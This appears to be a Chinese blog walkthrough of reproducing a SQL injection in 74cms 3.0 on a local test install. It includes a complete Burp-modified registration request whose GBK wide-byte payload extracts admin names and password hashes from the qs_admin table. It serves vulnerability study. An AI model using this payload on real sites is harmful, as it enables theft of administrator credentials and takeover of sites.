下载解压到www目录并开启低版本PHP服务

访问

http://127.0.0.1/74cms3.0/install/index.php

Error:Can‘t select MySQL database(74cms3.0)!问题解决

和我一样就无脑确定

按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com之类的

后台(可略过)

前台

注册

burpsuite抓包修改

realname=%B5%C8%D6%B0%EDE&sex=%C4%D0&birthday=1999-01-01&addresses=%BA%D3%C4%CF%BA%D3%C4%CF%D6%A3%D6%DD&mobile=&phone=17640366942&qq=15017777&msn=ha%df',profile=(select concat(admin_name,pwd,pwd_hash)from qs_admin)#&Submit=%B1%A3%B4%E6

有返回

以下原因是由于PHP版本过低,

 

74cms3.0安装以及cmsSQL注入漏洞详解相关推荐

  1. SQL 注入漏洞详解

    [渗透测试实用手册]SQL注入漏洞 漏洞名称 SQL注入漏洞 漏洞地址 漏洞等级 高危 漏洞描述 SQL 注入漏洞是指攻击者通过把恶意的 SQL 语句插入到网站的输入参数中,来绕过网站的安全措施,获取 ...

  2. XXE实体注入漏洞详解

    本文转自行云博客https://www.xy586.top/ 文章目录 什么是XXE 原理 XXE漏洞带来的的危害 什么是 XML 寻找XXE XXE的防御 示例 什么是XXE XML Externa ...

  3. SQL注入漏洞 详解

    漏洞影响 攻击者利用该漏洞可能导致 1.网页被篡改 2.数据被篡改 3. 核心数据被窃取 4. 数据库所在服务器被攻击变成傀儡主机 解决方法: 1.      过滤用户输入的内容,检查用户输入的内容中 ...

  4. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  5. Web网络安全漏洞分析,SQL注入原理详解

    本文主要为大家介绍了Web网络安全漏洞分析SQL注入的原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是 ...

  6. 数据库学习笔记第一弹——MySQL8.0和MySQL5.7的下载、安装与配置(图文详解步骤2022)

    数据库学习笔记第一弹--MySQL8.0和MySQL5.7的下载.安装与配置(图文详解步骤2022) 文章目录 数据库学习笔记第一弹--MySQL8.0和MySQL5.7的下载.安装与配置(图文详解步 ...

  7. android WebView详解,常见漏洞详解和安全源码(下)

    上篇博客主要分析了 WebView 的详细使用,这篇来分析 WebView 的常见漏洞和使用的坑.  上篇:android WebView详解,常见漏洞详解和安全源码(上)  转载请注明出处:http ...

  8. OWASP-TOP10漏洞详解以及防护方案

    OWASP TOP 10 漏洞详解以及防护方案 OWASP介绍 官网:http://www.owasp.org.cn/ OWASP TOP10 指出了 WEB 应用面临最大风险的 10 类问题,是目前 ...

  9. 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...

最新文章

  1. PCL中3D特征描述子Shot详解
  2. git commit如何修改默认编辑器为vim
  3. comsol稀物质传递_印刷指南丨印刷油墨传递的影响因素?
  4. 二、基础(IVX快速开发手册)
  5. 付完版面费就该吃土了
  6. jquery --- Poshy Tip jQuery Plugin
  7. table id=datatable - Requested unknown parameter 'tname' for row 0, column 4. 解决
  8. 批处理文件(bat文件)注册dll批量注册dll
  9. S3存储服务间数据同步工具Rclone迁移教程
  10. Docker-jenkins安装与部署
  11. QQ群文件下载速度慢解决办法
  12. 后门程序技术知识全面深解
  13. 万字干货!《人人都是产品经理》作者苏杰独家专访
  14. ASM和AAM的一些代码资源
  15. (转)tensorflow入门教程(二十六)人脸识别(上)
  16. 如何解决水平越权(横向越权)和纵向越权
  17. ArcGIS 栅格计算器con()函数用法
  18. Flutter 里的语法糖解析,知其所然方能潇洒舞剑,10天用Flutter撸了个高仿携程App
  19. RK3308 Linux UAC与ADB 复合同时使用
  20. 均值、方差、标准差、协方差的概念及意义

热门文章

  1. cryptojs vue 使用_VueJs里利用CryptoJs实现加密及解密的方法示例
  2. 完全相同的4个小矩形如图所示放置_短线投资,遇到“矩形突破”,斩钉截铁满仓干!...
  3. android注册界面高级,Android用户注册界面简单设计
  4. 《c语言从入门到精通》看书笔记——第15章 存储管理
  5. php文件引用问题,Php引用文件引起的空白行问题(UTF-8)
  6. 伦巴时间步的动作要领_准军集结号,叶教官队列动作教学
  7. typescript索引类型_TypeScript的索引类型与映射类型,以及常用工具泛型的实现
  8. 无失真压缩法可以减少冗余_机考样题(选择题带标准答案).docx
  9. java jpanel 缓冲画图_Java:Jpanel 缓冲区 图像
  10. L1-007 念数字